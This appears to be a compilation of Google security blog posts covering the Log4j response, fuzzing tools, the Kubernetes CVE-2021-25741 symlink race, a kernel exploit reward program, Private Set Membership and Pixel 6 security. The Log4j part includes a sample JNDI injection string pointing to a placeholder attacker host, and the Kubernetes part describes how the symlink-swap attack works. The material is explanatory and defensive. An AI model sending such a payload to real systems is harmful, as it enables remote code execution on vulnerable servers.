
Apache Log4j Vulnerability

Like many other companies, we’re closely following the multiple CVEs regarding Apache Log4j 2. Our security teams are investigating any potential impact on Google products and services and are focused on protecting our users and customers.

We encourage anyone who manages environments containing Log4j 2 to update to the latest version.

Based on findings in our ongoing investigations, here is our list of product and service updates as of December 17th (CVE-2021-44228 & CVE-2021-45046):

Android is not aware of any impact to the Android Platform or Enterprise. At this time, no update is required for this specific vulnerability, but we encourage our customers to ensure that the latest security updates are applied to their devices.

Chrome OS releases and infrastructure are not using versions of Log4j affected by the vulnerability.

Chrome Browser releases, infrastructure and admin console are not using versions of Log4j affected by the vulnerability.

Google Cloud has a specific advisory dedicated to updating customers on the status of GCP and Workspace products and services.

Google Marketing Platform, including Google Ads, is not using versions of Log4j affected by the vulnerability. This includes Display & Video 360, Search Ads 360, Google Ads, Analytics (360 and free), Optimize 360, Surveys 360 & Tag Manager 360.

YouTube is not using versions of Log4j affected by the vulnerability.

We will continue to update this advisory with the latest information.

Understanding the Impact of Apache Log4j Vulnerability



More than 35,000 Java packages, amounting to over 8% of the Maven Central repository (the most significant Java package repository), have been impacted by the recently disclosed log4j vulnerabilities (1, 2), with widespread fallout across the software industry. The vulnerabilities allow an attacker to perform remote code execution by exploiting the insecure JNDI lookups feature exposed by the logging library log4j. This exploitable feature was enabled by default in many versions of the library.
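
To make the attack vector concrete, below is a minimal, illustration-only Java sketch of the vulnerable pattern (the hostname is a placeholder and no exploit payload is shown). On affected Log4j 2 versions, logging a string that an attacker can influence is enough to trigger a remote JNDI lookup.

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    // Sketch of the vulnerable pattern only: an attacker-influenced value reaches a
    // log statement. On affected Log4j 2 versions, the ${jndi:...} lookup in the
    // message is resolved and the attacker's server is contacted; patched versions
    // do not perform the lookup.
    public class VulnerableLogging {
        private static final Logger logger = LogManager.getLogger(VulnerableLogging.class);

        public static void main(String[] args) {
            // Imagine this value arriving from an HTTP header, form field, or username.
            String attackerControlled = "${jndi:ldap://attacker.example/a}";
            logger.error("Login failed for user: {}", attackerControlled);
        }
    }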


This vulnerability has captivated the information security ecosystem since its disclosure on December 9th because of both its severity and widespread impact. As a popular logging tool, log4j is used by tens of thousands of software packages (known as artifacts in the Java ecosystem) and projects across the software industry. Users’ lack of visibility into their dependencies and transitive dependencies has made patching difficult; it has also made it difficult to determine the full blast radius of this vulnerability. Using Open Source Insights, a project to help understand open source dependencies, we surveyed all versions of all artifacts in the Maven Central Repository to determine the scope of the issue in the open source ecosystem of JVM-based languages, and to track the ongoing efforts to mitigate the affected packages.


How widespread is the log4j vulnerability?

As of December 16, 2021, we found that 35,863 of the available Java artifacts from Maven Central depend on the affected log4j code. This means that more than 8% of all packages on Maven Central have at least one version that is impacted by this vulnerability. (These numbers do not encompass all Java packages, such as directly distributed binaries, but Maven Central is a strong proxy for the state of the ecosystem.)

As far as ecosystem impact goes, 8% is enormous. The average ecosystem impact of advisories affecting Maven Central is 2%, with the median less than 0.1%.

Direct dependencies account for around 7,000 of the affected artifacts, meaning that at least one of their versions depends upon an affected version of log4j-core or log4j-api, as described in the CVEs. The majority of affected artifacts come from indirect dependencies (that is, the dependencies of one’s own dependencies), meaning log4j is not explicitly defined as a dependency of the artifact, but gets pulled in as a transitive dependency.


What is the current progress in fixing the open source JVM ecosystem?
We counted an artifact as fixed if it had at least one affected version and has since released a greater stable version (according to semantic versioning) that is unaffected. An artifact affected by log4j is considered fixed if it has updated to 2.16.0 or removed its dependency on log4j altogether.
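
As an illustration of this counting rule (not the actual Open Source Insights implementation), the sketch below treats an artifact as fixed when some unaffected release is newer, by a simplified semantic-version comparison, than every affected release:

    import java.util.List;

    // Illustrative sketch of the "fixed" counting rule above; not the Open Source
    // Insights implementation. Versions are simplified to dot-separated integers.
    public class FixedArtifactCheck {

        record Release(String version, boolean affectedByLog4j) {}

        // Compare two dot-separated numeric versions (e.g. "2.14.1" vs "2.16.0").
        static int compareVersions(String a, String b) {
            String[] pa = a.split("\\."), pb = b.split("\\.");
            for (int i = 0; i < Math.max(pa.length, pb.length); i++) {
                int x = i < pa.length ? Integer.parseInt(pa[i]) : 0;
                int y = i < pb.length ? Integer.parseInt(pb[i]) : 0;
                if (x != y) return Integer.compare(x, y);
            }
            return 0;
        }

        // An artifact counts as fixed if it has at least one affected release and some
        // unaffected release that is newer than every affected one.
        static boolean isFixed(List<Release> releases) {
            String highestAffected = null;
            for (Release r : releases) {
                if (r.affectedByLog4j()
                        && (highestAffected == null || compareVersions(r.version(), highestAffected) > 0)) {
                    highestAffected = r.version();
                }
            }
            if (highestAffected == null) return false; // never affected, so not counted
            for (Release r : releases) {
                if (!r.affectedByLog4j() && compareVersions(r.version(), highestAffected) > 0) {
                    return true;
                }
            }
            return false;
        }

        public static void main(String[] args) {
            // Hypothetical artifact: 1.2.0 and 1.3.0 pull in vulnerable log4j-core;
            // 1.4.0 upgraded or dropped it.
            System.out.println(isFixed(List.of(
                    new Release("1.2.0", true),
                    new Release("1.3.0", true),
                    new Release("1.4.0", false)))); // prints true
        }
    }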

At the time of writing, nearly five thousand of the affected artifacts have been fixed. This represents a rapid response and mammoth effort both by the log4j maintainers and the wider community of open source consumers.

That leaves over 30,000 artifacts affected, many of which depend on another artifact to patch first (the transitive dependency) and are likely blocked until it does.


Why is fixing the JVM ecosystem hard?
Most artifacts that depend on log4j do so indirectly. The deeper the vulnerability is in a dependency chain, the more steps are required for it to be fixed. The following diagram shows a histogram of how deeply an affected log4j package (core or api) first appears in consumers’ dependency graphs. For more than 80% of the affected packages, the vulnerability is more than one level deep, with a majority affected five levels down (and some as many as nine levels down). These packages will require fixes throughout all parts of the tree, starting from the deepest dependencies first.
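
The depth measurement can be pictured as a breadth-first search over each consumer’s dependency graph; the sketch below (assuming a simple adjacency-list representation rather than the Open Source Insights data model) returns the level at which an affected package first appears.

    import java.util.ArrayDeque;
    import java.util.Deque;
    import java.util.HashSet;
    import java.util.List;
    import java.util.Map;
    import java.util.Set;

    // Sketch only: breadth-first search over an adjacency-list dependency graph to find
    // how many levels down a target package (e.g. log4j-core) first appears.
    public class DependencyDepth {

        static int firstDepth(Map<String, List<String>> deps, String root, String target) {
            Deque<String> queue = new ArrayDeque<>(List.of(root));
            Set<String> seen = new HashSet<>(List.of(root));
            int depth = 0;
            while (!queue.isEmpty()) {
                depth++; // direct dependencies are depth 1, their dependencies depth 2, ...
                int levelSize = queue.size();
                for (int i = 0; i < levelSize; i++) {
                    for (String dep : deps.getOrDefault(queue.poll(), List.of())) {
                        if (dep.equals(target)) return depth;
                        if (seen.add(dep)) queue.add(dep);
                    }
                }
            }
            return -1; // target is not in this consumer's dependency graph
        }

        public static void main(String[] args) {
            // Hypothetical graph: app -> web-framework -> logging-facade -> log4j-core.
            Map<String, List<String>> deps = Map.of(
                    "app", List.of("web-framework"),
                    "web-framework", List.of("logging-facade"),
                    "logging-facade", List.of("log4j-core"));
            System.out.println(firstDepth(deps, "app", "log4j-core")); // prints 3
        }
    }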



Another difficulty is caused by ecosystem-level choices in the dependency resolution algorithm and requirement specification conventions.

In the Java ecosystem, it’s common practice to specify “soft” version requirements — exact versions that are used by the resolution algorithm if no other version of the same package appears earlier in the dependency graph. Propagating a fix often requires explicit action by the maintainers to update the dependency requirements to a patched version.

This practice is in contrast to other ecosystems, such as npm, where it’s common for developers to specify open ranges for dependency requirements. Open ranges allow the resolution algorithm to select the most recently released version that satisfies dependency requirements, thereby pulling in new fixes. Consumers can get a patched version on the next build after the patch is available, which propagates up the dependencies quickly. (This approach is not without its drawbacks; pulling in new fixes can also pull in new problems.)

How long will it take for this vulnerability to be fixed across the entire ecosystem?

It’s hard to say. We looked at all publicly disclosed critical advisories affecting Maven packages to get a sense of how quickly other vulnerabilities have been fully addressed. Less than half (48%) of the artifacts affected by a vulnerability have been fixed, so we might be in for a long wait, likely years.

But things are looking promising on the log4j front. After less than a week, 4,620 affected artifacts (~13%) have been fixed. This, more than any other stat, speaks to the massive effort by open source maintainers, information security teams and consumers across the globe.

Where to focus next?

Thanks and congratulations are due to the open source maintainers and consumers who have already upgraded their versions of log4j. As part of our investigation, we pulled together a list of 500 affected packages with some of the highest transitive usage. If you are a maintainer or user helping with the patching effort, prioritizing these packages could maximize your impact and unblock more of the community.

We encourage the open source community to continue to strengthen security in these packages by enabling automated dependency updates and adding security mitigations. Improvements such as these could qualify for financial rewards from the Secure Open Source Rewards program.

You can explore your package dependencies and their vulnerabilities by using Open Source Insights.

Improving OSS-Fuzz and Jazzer to catch Log4Shell

The discovery of the Log4Shell vulnerability has set the internet on fire. Similar to Shellshock and Heartbleed, Log4Shell is just the latest catastrophic vulnerability in software that runs the internet. Our mission as the Google Open Source Security Team is to secure the open source libraries the world depends on, such as Log4j. One of our capabilities in this space is OSS-Fuzz, a free fuzzing service that is used by over 500 critical open source projects and has found more than 7,000 vulnerabilities in its lifetime.

We want to empower open source developers to secure their code on their own. Over the next year we will work on better automated detection of non-memory corruption vulnerabilities such as Log4Shell. We have started this work by partnering with the security company Code Intelligence to provide continuous fuzzing for Log4j, as part of OSS-Fuzz. Also as part of this partnership, Code Intelligence improved their Jazzer fuzzing engine to make it capable of detecting remote JNDI lookups. We have awarded Code Intelligence $25,000 for this effort and will continue to work with them on securing the open source ecosystem.

Vulnerabilities like Log4Shell are an eye-opener for the industry in terms of new attack vectors. With OSS-Fuzz and Jazzer, we can now detect this class of vulnerabilities so that they can be fixed before they become a problem in production code.

Over the past year we have made a number of investments to strengthen the security of critical open source projects, and recently announced our $10 billion commitment to cybersecurity defense including $100 million to support third-party foundations that manage open source security priorities and help fix vulnerabilities.

We appreciate the maintainers, security engineers and incident responders that are working to mitigate Log4j and make our internet ecosystem safer.

Check out our documentation to get started using OSS-Fuzz.

Empowering the next generation of Android Application Security Researchers

The external security researcher community plays an integral role in making the Google Play ecosystem safe and secure. Through its partnership with this community, Google has been able to collaborate with third-party developers to fix thousands of security issues in Android applications before they are exploited, and to reward security researchers for their hard work and dedication.

In order to empower the next generation of Android security researchers, Google has collaborated with industry partners including HackerOne and PayPal to host a number of Android App Hacking Workshops. These workshops are an effort designed to educate security researchers and cybersecurity students of all skill levels on how to find Android application vulnerabilities through a series of hands-on working sessions, both in-person and virtual.

Through these workshops, we’ve seen attendees from groups such as Merritt College's cybersecurity program and alumni of Hack the Hood go on to report real-world security vulnerabilities to the Google Play Security Rewards program. This reward program is designed to identify and mitigate vulnerabilities in apps on Google Play, and keep Android users, developers and the Google Play ecosystem safe.

Today, we are releasing our slide deck and workshop materials, including source code for a custom-built Android application that allows you to test your Android application security skills in a variety of capture the flag style challenges.

These materials cover a wide range of techniques for finding vulnerabilities in Android applications. Whether you’re just getting started or have already found many bugs, chances are you’ll learn something new from these challenges! If you get stuck and need a hint on solving a challenge, the solutions for each are available in the Android App Hacking Workshop here.

As you work through the challenges and learn more about the techniques and tips described in our workshop materials, we’d love to hear your feedback.

Additional Resources:

  • If you want to learn more about how to prepare, launch, and run a Vulnerability Disclosure Program (VDP) or discover how to work with external security researchers, check out our VDP course here.
  • If you’re a developer looking to build more secure applications, check out Android app security best practices here.

Exploring Container Security: A Storage Vulnerability Deep Dive



Kubernetes security is constantly evolving, keeping pace with enhanced functionality, usability and flexibility while also balancing the security needs of a wide and diverse set of use cases.

Recently, the GKE Security team discovered a high severity vulnerability that allowed workloads to have access to parts of the host filesystem outside the mounted volumes’ boundaries. Although the vulnerability was patched back in September, we thought it would be beneficial to write up a more in-depth analysis of the issue to share with the community.

We assessed the impact of the vulnerability as described in vulnerability management in open-source Kubernetes and worked closely with the GKE Storage team and the Kubernetes Security Response Committee to find a fix. In this post we’ll give some background on how the subpath storage system works, an overview of the vulnerability, the steps to find the root cause and the fix, and finally some recommendations for GKE and Anthos users.


Kubernetes Filesystems: Intro to Volume Subpath
The vulnerability, CVE-2021-25741, was caused by a race condition during the creation of a subpath bind mount inside a container, and allowed an attacker to gain unauthorized access to the underlying node filesystem and its sensitive files. We’ll describe how that system is supposed to work, and then talk about the vulnerability.

The volume subpath feature in Kubernetes enables sharing a volume in multiple containers inside a pod. For example, we could create a Pod with an InitContainer that creates directories with pre-populated data in a mounted filesystem volume. These directories can then be used by containers in the same Pod by mounting the same volume and optionally specifying a subpath field to limit what's visible inside the container.

While there are some great use cases for this feature, it’s an area that has had vulnerabilities discovered in the past. The kubelet must be extra cautious when handling user-owned subpaths because it operates with privileges on the host. One vulnerability that was previously discovered involved the creation of a malicious workload where an InitContainer would create a symlink pointing to any location on the host. For example, the InitContainer could mount a volume in /mnt and create a symlink /mnt/attack inside the container pointing to /etc. Later in the Pod lifecycle, another container would attempt to mount the same volume with subpath attack. While preparing the volumes for the container, the kubelet would end up following the symlink to the host’s /etc instead of the container’s /etc, unknowingly exposing the host filesystem to the container. A previous fix made sure that the subpath mount location is resolved and validated to point to a location inside the base volume, and that it is not changeable by the user between the time the path was validated and when the container runtime bind mounts it. This race condition is known as time of check to time of use (TOCTOU), where the subject being validated changes after it has been validated.
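
To illustrate the check-then-use window in isolation, here is a conceptual sketch in plain Java rather than the kubelet’s Go code; the path and the bindMount helper are placeholders for illustration only.

    import java.nio.file.Files;
    import java.nio.file.Path;

    // Conceptual sketch of a TOCTOU window, not kubelet code. The path and bindMount()
    // stub are placeholders for illustration only.
    public class ToctouSketch {

        static void bindMount(Path source) {
            // Stub: in the kubelet, this is where the subpath would be bind-mounted
            // into the container.
            System.out.println("bind mounting " + source);
        }

        public static void main(String[] args) {
            Path subpath = Path.of("/mnt/volume/attack");

            // Time of check: the path currently looks like an ordinary directory...
            if (Files.isDirectory(subpath) && !Files.isSymbolicLink(subpath)) {
                // ...but an attacker who swaps it for a symlink (e.g. to /etc) in this
                // window changes what the next step actually operates on.
                bindMount(subpath); // time of use
            }
        }
    }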

These validations and others are summarized in the following container lifecycle sequence diagram.




Volume subpath validations before the container startup

A New TOCTOU Vulnerability: CVE-2021-25741
The latest vulnerability was discovered by performing a symlink attack similar to the one explained above, with the difference being that it constantly swapped the symlink with a directory in a tight loop, using the RENAME_EXCHANGE option with renameat(2). If the timing is just right, the kubelet will see the path as a directory and pass the validation check. Then the mount utility may find that the path is a symlink pointing to the host and follow it, exposing the host filesystem to the container. This is visualized in the following diagram:


The expectation and the attack outcome

The GKE Security and Storage teams worked closely to revise the previously applied fix and find a solution. That fix takes several steps to ensure that the directory being mounted is safely opened and validated. After the file is opened and validated, the kubelet uses the magic-link path under the /proc/[pid]/fd directory for all subsequent operations to ensure the file remains unchanged. However, we found that all of these efforts were undone by the mount(8) Linux utility, which was dereferencing the procfs magic-link by default. Once the problem was understood, the fix involved making sure that the mount utility doesn't dereference the magic-links, by using the --no-canonicalize flag in the mount command.

The fix is in

Once the problem was well understood, we fixed it inside Kubernetes and quickly released the fix to GKE and Anthos. If GKE auto-upgrade is enabled in your clusters, there's no action needed on your part for this vulnerability; your nodes have already been patched. We strongly recommend that customers utilize auto-upgrades. Auto-upgrade gives peace of mind that your clusters are running with the latest patches.

GKE released a Google Kubernetes Engine security bulletin on this vulnerability, which detailed what customers can do to immediately remediate this issue across GKE and Anthos. We also provided guidance to customers who manually manage their node versions, ensuring that fixed releases were available in every region for our Static and Release Channels.

Moving forward
Google continues to invest heavily in the security of GKE and Kubernetes. We encourage users interested in finding vulnerabilities to participate in the Kubernetes bug bounty program and in the Google Vulnerability Rewards Program (VRP) which was recently expanded to cover GKE vulnerabilities. For the latest guidance on security issues, please follow our GKE Security Bulletins.

ClusterFuzzLite: Continuous fuzzing for all



In recent years, continuous fuzzing has become an essential part of the software development lifecycle. By feeding unexpected or random data into a program, fuzzing catches bugs that would otherwise slip through the most thorough manual checks and provides coverage that would take staggering human effort to replicate. NIST’s guidelines for software verification, recently released in response to the White House Executive Order on Improving the Nation’s Cybersecurity, specify fuzzing among the minimum standard requirements for code verification.

Today, we are excited to announce ClusterFuzzLite, a continuous fuzzing solution that runs as part of CI/CD workflows to find vulnerabilities faster than ever before. With just a few lines of code, GitHub users can integrate ClusterFuzzLite into their workflow and fuzz pull requests to catch bugs before they are committed, enhancing the overall security of the software supply chain.

Since its release in 2016, over 500 critical open source projects have integrated with Google’s OSS-Fuzz program, resulting in over 6,500 vulnerabilities and 21,000 functional bugs being fixed. ClusterFuzzLite goes hand-in-hand with OSS-Fuzz by catching regression bugs much earlier in the development process.

Large projects including systemd and curl are already using ClusterFuzzLite during code review, with positive results. According to Daniel Stenberg, author of curl, “When the human reviewers nod and have approved the code and your static code analyzers and linters can't detect any more issues, fuzzing is what takes you to the next level of code maturity and robustness. OSS-Fuzz and ClusterFuzzLite help us maintain curl as a quality project, around the clock, every day and every commit.”

With the release of ClusterFuzzLite, any project can integrate this essential testing standard and benefit from fuzzing. ClusterFuzzLite offers many of the same features as ClusterFuzz, such as continuous fuzzing, sanitizer support, corpus management, and coverage report generation. Most importantly, it’s easy to set up and works with closed source projects, making ClusterFuzzLite a convenient option for any developer who wants to fuzz their software.

With ClusterFuzzLite, fuzzing is no longer just an idealized "bonus" round of testing for those who have access to it, but a critical must-have step that everyone can use continuously on every software project. By finding and preventing bugs before they enter the codebase we can build a more secure software ecosystem.

To learn more, check out the ClusterFuzzLite documentation. ClusterFuzzLite currently supports GitHub Actions, Google Cloud Build and Prow. We built this with CI system extensibility in mind, and adding support for other CI systems is straightforward. Please contact us if you’re interested in contributing support, or have any questions, feedback or feature requests.

Trick & Treat! Paying Leets and Sweets for Linux Kernel privescs and k8s escapes


Starting today and for the next three months (until January 31, 2022), we will pay 31,337 USD to security researchers who exploit privilege escalation in our lab environment with a patched vulnerability, and 50,337 USD to those who use a previously unpatched vulnerability or a new exploit technique.

We are constantly investing in the security of the Linux Kernel because much of the internet, and Google itself, from the devices in our pockets to the services running on Kubernetes in the cloud, depends on its security. We research its vulnerabilities and attacks, as well as study and develop its defenses.

But we know that there is more work to do. That’s why we have decided to build on top of our kCTF VRP from last year and triple our previous reward amounts (for at least the next 3 months).

Our base reward for each publicly patched vulnerability is 31,337 USD (at most one exploit per vulnerability), but the reward can go up to 50,337 USD in two cases:
  • If the vulnerability was otherwise unpatched in the Kernel (0day)
  • If the exploit uses a new attack or technique, as determined by Google
We hope the new rewards will encourage the security community to explore new Kernel exploitation techniques to achieve privilege escalation and drive quicker fixes for these vulnerabilities. It is important to note that the easiest exploitation primitives are not available in our lab environment due to the hardening done on Container-Optimized OS. Note that this program complements Android's VRP rewards, so exploits that work on Android could also be eligible for up to 250,000 USD (that's in addition to this program).

The mechanics are:
  1. Connect to the kCTF VRP cluster, obtain root and read the flag (read this writeup for how it was done before, and this threat model for inspiration), and then submit your flag and a checksum of your exploit in this form.
  2. (If applicable) report vulnerabilities to upstream.
    • We strongly recommend including a patch since that could qualify for an additional reward from our Patch Reward Program, but please report vulnerabilities upstream promptly once you confirm they are exploitable.
  3. Report your finding to Google VRP once all patches are publicly available (we don't want to receive details of unpatched vulnerabilities ahead of the public.)
    • Provide the exploit code and the algorithm used to calculate the hash checksum.
    • A rough description of the exploit strategy is welcome.
Reports will be triaged on a weekly basis. If anyone has problems with the lab environment (for example, if it's unavailable), technical issues or other questions, contact us on Discord in #kctf. You can read more details about the program here. Happy hunting!

Protecting your device information with Private Set Membership


At Google, keeping you safe online is our top priority, so we continuously build the most advanced privacy-preserving technologies into our products. Over the past few years, we've utilized innovations in cryptographic research to keep your personal information private by design and secure by default. As part of this, we launched Password Checkup, which protects account credentials by notifying you if an entered username and password are known to have been compromised in a prior data breach. Using cryptographic techniques, Password Checkup can do this without revealing your credentials to anyone, including Google. Today, Password Checkup protects users across many platforms including Android, Chrome and Google Password Manager.

Another example is Private Join and Compute, an open source protocol which enables organizations to work together and draw insights from confidential data sets. Two parties are able to encrypt their data sets, join them, and compute statistics over the joint data. By leveraging secure multi-party computation, Private Join and Compute is designed to ensure that the plaintext data sets are concealed from all parties.

In this post, we introduce the next iteration of our research, Private Set Membership, as well as its open-source availability. At a high level, Private Set Membership considers the scenario in which Google holds a database of items, and user devices need to contact Google to check whether a specific item is found in the database. As an example, users may want to check membership of a computer program on a block list consisting of known malicious software before executing the program. Often, the set’s contents and the queried items are sensitive, so we designed Private Set Membership to perform this task while preserving the privacy of our users.

Protecting your device information during enrollment
Beginning in Chrome 94, Private Set Membership will enable Chrome OS devices to complete the enrollment process in a privacy-preserving manner. Device enrollment is an integral part of the out-of-box experience that welcomes you when getting started with a Chrome OS device.

The device enrollment process requires checking membership of device information in encrypted Google databases, including checking if a device is enterprise enrolled or determining if a device was pre-packaged with a license. The correct end state of your Chrome OS device is determined using the results of these membership checks.

During the enrollment process, we protect your Chrome OS devices by ensuring that no information that could be decrypted by anyone else ever leaves the device when using Private Set Membership. Google will never learn any device information, and devices will not learn any unnecessary information about other devices. To our knowledge, this is the first instance of advanced cryptographic tools being leveraged to protect device information during the enrollment process.

A deeper look at Private Set Membership
Private Set Membership is built upon two cryptographic tools:
  • Homomorphic encryption is a powerful cryptographic tool that enables computation over encrypted data without the need for decryption. As an example, given the encryptions of values X and Y, homomorphic encryption enables computing the encryption of the sum of X and Y without ever needing to decrypt; see the sketch after this list. This preserves privacy as the data remains concealed during the computation. Private Set Membership is built upon Google’s open source homomorphic encryption library.
  • Oblivious hashing is a cryptographic technique that enables two parties to jointly compute a hash, H(K, x), where the sender holds the key, K, and the receiver holds the hash input, x. The receiver will obtain the hash, H(K, x), without learning the key K. At the same time, the input x will be hidden from the sender.
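
To make the additive property concrete, here is a toy Paillier-style sketch in Java. It is an illustration only, not Google’s open source homomorphic encryption library and not production-grade cryptography, but it shows how two ciphertexts can be combined so that decryption yields the sum of the plaintexts without either value being decrypted on its own.

    import java.math.BigInteger;
    import java.security.SecureRandom;

    // Toy additively homomorphic (Paillier-style) sketch; illustration only.
    public class ToyPaillier {
        private static final SecureRandom RNG = new SecureRandom();
        final BigInteger n, nSquared;        // public key
        private final BigInteger lambda, mu; // private key

        ToyPaillier(int bits) {
            BigInteger p = BigInteger.probablePrime(bits / 2, RNG);
            BigInteger q = BigInteger.probablePrime(bits / 2, RNG);
            n = p.multiply(q);
            nSquared = n.multiply(n);
            BigInteger pm1 = p.subtract(BigInteger.ONE), qm1 = q.subtract(BigInteger.ONE);
            lambda = pm1.multiply(qm1).divide(pm1.gcd(qm1)); // lcm(p-1, q-1)
            mu = lambda.modInverse(n);                       // valid because g = n + 1
        }

        BigInteger encrypt(BigInteger m) {
            BigInteger r;
            do {
                r = new BigInteger(n.bitLength(), RNG);
            } while (r.signum() == 0 || r.compareTo(n) >= 0);
            // c = (1 + m*n) * r^n mod n^2, using the common choice g = n + 1
            return BigInteger.ONE.add(m.multiply(n)).multiply(r.modPow(n, nSquared)).mod(nSquared);
        }

        BigInteger decrypt(BigInteger c) {
            // m = L(c^lambda mod n^2) * mu mod n, where L(x) = (x - 1) / n
            BigInteger l = c.modPow(lambda, nSquared).subtract(BigInteger.ONE).divide(n);
            return l.multiply(mu).mod(n);
        }

        // Homomorphic addition: multiplying ciphertexts adds the underlying plaintexts.
        BigInteger add(BigInteger c1, BigInteger c2) {
            return c1.multiply(c2).mod(nSquared);
        }

        public static void main(String[] args) {
            ToyPaillier keys = new ToyPaillier(1024);
            BigInteger x = BigInteger.valueOf(20), y = BigInteger.valueOf(22);
            BigInteger encryptedSum = keys.add(keys.encrypt(x), keys.encrypt(y));
            System.out.println(keys.decrypt(encryptedSum)); // prints 42; x and y were never decrypted individually
        }
    }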
Take a look at how Private Set Membership utilizes homomorphic encryption and oblivious hashing to protect data below:



For a deeper look into the technology behind Private Set Membership, you can also access our open source code.

Privacy properties
By using Private Set Membership, the following privacy properties are obtained:
  • No data leaves the device when checking membership. We designed Private Set Membership using advanced cryptographic techniques to ensure that data never leaves the device in an unencrypted manner when performing membership checks. As a result, the data on your device will be concealed from everyone, including Google.
  • Devices learn only membership information and nothing else. Private Set Membership was designed to prevent devices from learning any unnecessary information about other devices when querying. For each query, devices learn only the results of the membership check and no other information.
Using Private Set Membership to solve more problems
Private Set Membership is a powerful tool that solves a fundamental problem in a privacy-preserving manner. This is just the beginning of what’s possible using this technology. Private Set Membership can help preserve user privacy across a wide array of applications. For example:
  • Checking allow or block lists. In this setting, users check membership in an allow or block list to determine whether to proceed with the desired action. Private Set Membership enables this check without any information about the software leaving the device.
  • Control flows with conditional membership checks. Control flows are a common computer science concept that represent arbitrary computer programs with conditional branching. In many cases, the conditional branches require checking membership of sensitive data to determine the next step of the algorithm. By utilizing Private Set Membership, we enable execution of these algorithms while ensuring data never leaves the user’s device.
We still have a ways to go before Private Set Membership is used for general membership checks by devices. At Google, we are exploring a number of potential use cases to protect your privacy using Private Set Membership. We are excited to continue advancing the state-of-the-art cryptographic research to keep you safe.

Acknowledgements


The work in this post is the result of a collaboration between a large group of current and former Google engineers, research scientists and others including: Amr Aboelkher, Asra Ali, Ghous Amjad, Yves Arrouye, Roland Bock, Xi Chen, Maksim Ivanov, Dennis Kalinichenko, Nirdhar Khazanie, Dawon Lee, Tancrède Lepoint, Lawrence Lui, Pavol Marko, Thiemo Nagel, Mariana Raykova, Aaron Segal, Joon Young Seo, Karn Seth, and Jason Wong.

Pixel 6: Setting a new standard for mobile security

With Pixel 6 and Pixel 6 Pro, we’re launching our most secure Pixel phone yet, with 5 years of security updates and the most layers of hardware security. These new Pixel smartphones take a layered security approach, with innovations spanning across the Google Tensor system on a chip (SoC) hardware to new Pixel-first features in the Android operating system, making it the first Pixel phone with Google security from the silicon all the way to the data center. Multiple dedicated security teams have also worked to ensure that Pixel’s security is provable through transparency and external validation.

Secure to the Core

Google has put user data protection and transparency at the forefront of hardware security with Google Tensor. Google Tensor’s main processors are Arm-based and utilize TrustZone™ technology. TrustZone is a key part of our security architecture for general secure processing, but the security improvements included in Google Tensor go beyond TrustZone.

Figure 1. Pixel Secure Environments

The Google Tensor security core is a custom-designed security subsystem dedicated to the preservation of user privacy. It's distinct from the application processor, not only logically, but physically, and consists of a dedicated CPU, ROM, one-time-programmable (OTP) memory, crypto engine, internal SRAM, and protected DRAM. For Pixel 6 and 6 Pro, the security core’s primary use cases include protecting user data keys at runtime, hardening secure boot, and interfacing with Titan M2™.

Your secure hardware is only as good as your secure OS, and we are using Trusty, our open source trusted execution environment. Trusty OS is the secure OS used both in TrustZone and the Google Tensor security core.

With Pixel 6 and Pixel 6 Pro your security is enhanced by the new Titan M2™, our discrete security chip, fully designed and developed by Google. In this next generation chip, we moved to an in-house designed RISC-V processor, with extra speed and memory, and made it even more resilient to advanced attacks. Titan M2™ has been tested against the most rigorous standard for vulnerability assessment, AVA_VAN.5, by an independent, accredited evaluation lab. Titan M2™ supports Android Strongbox, which securely generates and stores keys used to protect your PINs and passwords, and works hand-in-hand with the Google Tensor security core to protect user data keys while in use in the SoC.

Moving a step higher in the system, Pixel 6 and Pixel 6 Pro ship with Android 12 and a slew of Pixel-first and Pixel-exclusive features.

Enhanced Controls

We aim to give users better ways to control their data and manage their devices with every release of Android. Starting with Android 12 on Pixel, you can use the new Security hub to manage all your security settings in one place. It helps protect your phone, apps, Google Account, and passwords by giving you a central view of your device’s current configuration. Security hub also provides recommendations to improve your security, helping you decide what settings best meet your needs.

For privacy, we are launching Privacy Dashboard, which will give you a simple and clear timeline view of the apps that have accessed your location, microphone and camera in the last 24 hours. If you notice apps that are accessing more data than you expected, the dashboard provides a path to controls to change those permissions on the fly.

To provide additional transparency, new indicators in Pixel’s status bar will show you when your camera and mic are being accessed by apps. If you want to disable that access, new privacy toggles give you the ability to turn off camera or microphone access across apps on your phone with a single tap, at any time.

The Pixel 6 and Pixel 6 Pro also include a toggle that lets you remove your device’s ability to connect to less-secure 2G networks. While necessary in certain situations, accessing 2G networks can open up additional attack vectors; this toggle helps users mitigate those risks when 2G connectivity isn’t needed.

Built-in security

By making all of our products secure by default, Google keeps more people safe online than anyone else in the world. With the Pixel 6 and Pixel 6 Pro, we’re also ratcheting up the dial on default, built-in protections.

Our new optical under-display fingerprint sensor ensures that your biometric information is secure and never leaves your device. As part of our ongoing security development lifecycle, Pixel 6 and 6 Pro’s fingerprint unlock has been externally validated by security experts as a strong and secure biometric unlock mechanism meeting the Class 3 strength requirements defined in the Android 12 Compatibility Definition Document (CDD).

Phishing continues to be a huge attack vector, affecting everyone across different devices.

The Pixel 6 and Pixel 6 Pro introduce new anti-phishing protections. Built-in protections automatically scan for potential threats from phone calls, text messages, emails, and links sent through apps, notifying you if there’s a potential problem.

Users are also now better protected against bad apps by enhancements to our on-device detection capabilities within Google Play Protect. Since its launch in 2017, Google Play Protect has provided the ability to detect malicious applications even when the device is offline. The Pixel 6 and Pixel 6 Pro use new machine learning models that improve the detection of malware in Google Play Protect. The detection runs on your Pixel and uses a privacy-preserving technology called federated analytics to discover commonly-run bad apps. This will help to further protect over 3 billion users by improving Google Play Protect, which already analyzes over 100 billion apps every day to detect threats.

Many of Pixel’s privacy-preserving features run inside Private Compute Core, an open source sandbox isolated from the rest of the operating system and apps. Our open source Private Compute Services manages network communication for these features, and uses federated learning, federated analytics, and private information retrieval to improve features while preserving privacy. Some features already running on Private Compute Core include Live Caption, Now Playing, and Smart Reply suggestions.

Google Binary Transparency (GBT) is the newest addition to our open and verifiable security infrastructure, providing a new layer of software integrity for your device. Building on the principles pioneered by Certificate Transparency, GBT helps ensure your Pixel is only running verified OS software. It works by using append-only logs to store signed hashes of the system images. The logs are public and can be used to verify that what’s published is the same as what’s on the device – giving users and researchers the ability to independently verify OS integrity for the first time.

Beyond the Phone

